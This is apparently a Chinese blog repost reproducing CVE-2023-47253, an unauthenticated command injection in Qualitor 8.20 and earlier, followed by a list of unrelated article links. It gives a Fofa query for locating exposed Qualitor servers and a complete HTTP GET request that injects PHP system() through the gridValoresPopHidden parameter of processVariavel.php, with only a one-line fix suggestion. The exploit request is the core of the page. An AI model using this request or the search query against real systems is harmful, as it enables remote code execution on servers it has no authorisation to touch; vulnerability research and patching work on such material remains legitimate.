当前位置: 首页 > article >正文

Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)

0x01 漏洞描述:

Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码,利用难度较低危害较大。

0x02 影响版本:

Qualitor <= 8.20

0x03 搜索语句:

Fofa:app="Qualitor-Web"

0x04 漏洞复现:

GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("netstat%20-ano"); HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 

0x05 修复建议:

对接口入参进行严格防护,限制特殊字符输入

参考:

Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)-CSDN博客


http://www.kler.cn/a/325052.html

相关文章:

  • Ascend C算子性能优化实用技巧05——API使用优化
  • 如何在 Ubuntu 上安装 Jupyter Notebook
  • springboot第82集:消息队列kafka,kafka-map
  • 【微信小程序】访客管理
  • 计算机视觉和机器人技术中的下一个标记预测与视频扩散相结合
  • 2020年计挑赛往届真题(C++)
  • [Redis][持久化][上][RDB]详细讲解
  • 每天一个数据分析题(四百九十)- 主成分分析与因子分析
  • 7种限流算法打开新方式
  • Win32打开UWP应用
  • 数据库服务器该如何进行搭建?
  • Kali Linux上安装远程桌面服务VNC
  • 线性代数复习笔记
  • 指针(3)
  • 第18周 第1章Ajax基础知识
  • flutter中InkWell 和 GestureDetector快速、频繁点击时表现出不响应或“点不到”的情况分析
  • 区块链:数据安全与透明的未来触手可及
  • 制造解法 Manufactured Solutions 相关的论文的阅读笔记
  • 安全、稳定、SLA高达99.9%:Azure OpenAI数据分离与隔离优势
  • C语言编写一个五子棋游戏-代码实例讲解与分析
  • 求10 个整数中最大值
  • 基于大数据技术的宠物商品信息比价及推荐系统
  • Transformer算法7个面试常见问题
  • python中的assert语句
  • Android TextView对URL识别
  • Kafka技术详解[5]: 集群启动